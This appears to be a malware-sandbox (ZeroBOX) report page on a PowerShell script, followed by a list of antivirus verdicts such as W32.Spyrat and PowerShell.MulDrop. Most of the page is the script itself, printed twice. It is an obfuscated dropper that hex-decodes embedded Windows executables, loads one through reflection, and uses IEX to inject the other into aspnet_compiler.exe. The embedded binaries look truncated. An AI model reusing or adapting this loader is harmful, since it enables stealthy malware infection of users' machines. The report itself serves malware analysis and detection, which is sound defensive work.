popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
[String]$RSETDRYFTUYGIOJIPOK='4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000080100000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000DA171B0D9E76755E9E76755E9E76755ED355685E9F76755ECD556C5E9C76755E9E76755E9276755EE56A795E9F76755E1D6A7B5E9D76755E76697F5E9576755E7669715E9A76755EFC69665E9176755E9E76745EAE77755E2670735E9F76755E76697E5E8976755E526963689E76755E000000000000000000000000000000000000000000000000504500004C01040075A36E580000000000000000E0000F010B01060000F00000007000000000000088FD0000001000000000010000004000001000000010000004000000000000000400000000000000007001000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000F01B01001801000000600100380F00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000050000000000000000000000
Function RDYTFUYGIUHOIJPOIOHG7U6FY5F6U7I8 {
[CmdletBinding()]
[OutputType([byte[]])]
param(
[Parameter(Mandatory=$true)] [String]$EXRCTVUYBIUYGUTFYRDTESRDYFJT
$RYTFUYGIUHOIJOHUGYT = New-Object -TypeName byte[] -ArgumentList ($EXRCTVUYBIUYGUTFYRDTESRDYFJT.Length / 2)
for ($i = 0; $i -lt $EXRCTVUYBIUYGUTFYRDTESRDYFJT.Length; $i += 2) {
$RYTFUYGIUHOIJOHUGYT[$i / 2] = [Convert]::ToByte($EXRCTVUYBIUYGUTFYRDTESRDYFJT.Substring($i, 2), 16)
return [byte[]]$RYTFUYGIUHOIJOHUGYT
[String]$ERXTRCYTMVUYIUYUGT='4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300D0F1FADE0000000000000000E0000E210B01300000E401000004000000000000EE0302000020000000200200000040000020000000020000040000000000000004000000000000000060020000020000CC0202000300408500001000001000000000100000100000000000000F0000000000000000000000A00302004B000000002002001000000000000000000000000000000000000000004002000C000000550302001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000F4E301000020000000E4010000020000000000000000000000000000200000602E7273726300000010000000002002000002000000E60100000000000000000000000000400000402E72656C6F6300000C000000004002000002000000E8010000000000000000000000000040000042000
[Byte[]]$SRETDRDTFYTYTFTYFYTFYFYFY=RDYTFUYGIUHOIJPOIOHG7U6FY5F6U7I8 $ERXTRCYTMVUYIUYUGT
[Byte[]]$YVFJBYYTFYTFVYDYUTRDYTRHVD= RDYTFUYGIUHOIJPOIOHG7U6FY5F6U7I8 $RSETDRYFTUYGIOJIPOK
$GFVTHFVYTFTFTDTRCCTRCDTR = 'VNPT.B'
$GFYTFYFGFYFGYJUYHUYTYGTFY5ETR = 'NET'
$VYFVTHFTHYJGUHYTFRDR ='GVHFYTGYTFYTFFHYGFTFTFYpe'.Replace("VHFYTGYTFYTFFHYGFTFTFY","etTy")
$GHFYFBYTBUYGUYHYGFYJFD ='InHGYJGYUGYUHGYUGHHGYFke'.Replace("HGYJGYUGYUHGYUGHHGYF","vo")
$FGYFGTFYDRDDGTFUYUYRFTYD ="GeBFTFYYTGYTFGTRDTRRDod".Replace("BFTFYYTGYTFGTRDTRRD","tMeth")
$DVTRDFTRGTFDTRDTRDT = 'C:\Windows\----------------\aspnet_compiler.exe'.Replace("----------------","Microsoft.NET\Framework\v4.0.30319")
$JYGYBFBGFYTBYJTFGYTDTR = 'L-------------d'.Replace("-------------","oa")
$VDTRVDGYRVDVYRDTR='$n------------ll'.Replace("------------","U")
$GUYFYTGFYTDFTRDT4DER = [Reflection.Assembly]
$FYTVDYTFYGTFTFYTFTFYTF = $GUYFYTGFYTDFTRDT4DER::$JYGYBFBGFYTBYJTFGYTDTR($SRETDRDTFYTYTFTYFYTFYFYFY);$t1 = '$FYTVDYTFYGTFTFYTFTFYTF.$VYFVTHFTHYJGUHYTFRDR($GFVTHFVYTFTFTDTRCCTRCDTR).$FGYFGTFYDRDDGTFUYUYRFTYD($GFYTFYFGFYFGYJUYHUYTYGTFY5ETR).$GHFYFBYTBUYGUYHYGFYJFD';$t2 = '($VDTRVDGYRVDVYRDTR,[object[]] ($DVTRDFTRGTFDTRDTRDT,$YVFJBYYTFYTFVYDYUTRDYTRHVD))';$HBar=($t1,$t2 -Join '')|I`E`X
start-sleep -s 5
[String]$RSETDRYFTUYGIOJIPOK='4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103002390B75E0000000000000000E00002010B01080000B20000000A0000000000009ED000000020000000E00000000040000020000000020000040000000000000004000000000000000020010000020000000000000200408500001000001000000000100000100000000000001000000000000000000000004CD000004F00000000E00000FF07000000000000000000000000000000000000000001000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000A4B000000020000000B2000000020000000000000000000000000000200000602E72737263000000FF07000000E000000008000000B40000000000000000000000000000400000402E72656C6F6300000C000000000001000002000000BC00000000000000000000000000004000004200
Function RDYTFUYGIUHOIJPOIOHG7U6FY5F6U7I8 {
[CmdletBinding()]
[OutputType([byte[]])]
param(
[Parameter(Mandatory=$true)] [String]$EXRCTVUYBIUYGUTFYRDTESRDYFJT
$RYTFUYGIUHOIJOHUGYT = New-Object -TypeName byte[] -ArgumentList ($EXRCTVUYBIUYGUTFYRDTESRDYFJT.Length / 2)
for ($i = 0; $i -lt $EXRCTVUYBIUYGUTFYRDTESRDYFJT.Length; $i += 2) {
$RYTFUYGIUHOIJOHUGYT[$i / 2] = [Convert]::ToByte($EXRCTVUYBIUYGUTFYRDTESRDYFJT.Substring($i, 2), 16)
return [byte[]]$RYTFUYGIUHOIJOHUGYT
[String]$ERXTRCYTMVUYIUYUGT='4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300D0F1FADE0000000000000000E0000E210B01300000E401000004000000000000EE0302000020000000200200000040000020000000020000040000000000000004000000000000000060020000020000CC0202000300408500001000001000000000100000100000000000000F0000000000000000000000A00302004B000000002002001000000000000000000000000000000000000000004002000C000000550302001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000F4E301000020000000E4010000020000000000000000000000000000200000602E7273726300000010000000002002000002000000E60100000000000000000000000000400000402E72656C6F6300000C000000004002000002000000E8010000000000000000000000000040000042000
[Byte[]]$SRETDRDTFYTYTFTYFYTFYFYFY=RDYTFUYGIUHOIJPOIOHG7U6FY5F6U7I8 $ERXTRCYTMVUYIUYUGT
[Byte[]]$YVFJBYYTFYTFVYDYUTRDYTRHVD= RDYTFUYGIUHOIJPOIOHG7U6FY5F6U7I8 $RSETDRYFTUYGIOJIPOK
$GFVTHFVYTFTFTDTRCCTRCDTR = 'VNPT.B'
$GFYTFYFGFYFGYJUYHUYTYGTFY5ETR = 'NET'
$VYFVTHFTHYJGUHYTFRDR ='GVHFYTGYTFYTFFHYGFTFTFYpe'.Replace("VHFYTGYTFYTFFHYGFTFTFY","etTy")
$GHFYFBYTBUYGUYHYGFYJFD ='InHGYJGYUGYUHGYUGHHGYFke'.Replace("HGYJGYUGYUHGYUGHHGYF","vo")
$FGYFGTFYDRDDGTFUYUYRFTYD ="GeBFTFYYTGYTFGTRDTRRDod".Replace("BFTFYYTGYTFGTRDTRRD","tMeth")
$DVTRDFTRGTFDTRDTRDT = 'C:\Windows\----------------\aspnet_compiler.exe'.Replace("----------------","Microsoft.NET\Framework\v4.0.30319")
$JYGYBFBGFYTBYJTFGYTDTR = 'L-------------d'.Replace("-------------","oa")
$VDTRVDGYRVDVYRDTR='$n------------ll'.Replace("------------","U")
$GUYFYTGFYTDFTRDT4DER = [Reflection.Assembly]
$FYTVDYTFYGTFTFYTFTFYTF = $GUYFYTGFYTDFTRDT4DER::$JYGYBFBGFYTBYJTFGYTDTR($SRETDRDTFYTYTFTYFYTFYFYFY);$t1 = '$FYTVDYTFYGTFTFYTFTFYTF.$VYFVTHFTHYJGUHYTFRDR($GFVTHFVYTFTFTDTRCCTRCDTR).$FGYFGTFYDRDDGTFUYUYRFTYD($GFYTFYFGFYFGYJUYHUYTYGTFY5ETR).$GHFYFBYTBUYGUYHYGFYJFD';$t2 = '($VDTRVDGYRVDVYRDTR,[object[]] ($DVTRDFTRGTFDTRDTRDT,$YVFJBYYTFYTFVYDYUTRDYTRHVD))';$HBar=($t1,$t2 -Join '')|I`E`X
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
Cyren Clean
Symantec W32.Spyrat
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
DrWeb PowerShell.MulDrop.115
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Clean
Emsisoft Clean
Jiangmin Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
GData Clean
Cynet Clean
AhnLab-V3 Clean
BitDefenderTheta Clean
ALYac Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Trojan.JS.Crypt
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
Qihoo-360 Clean
No IRMA results available.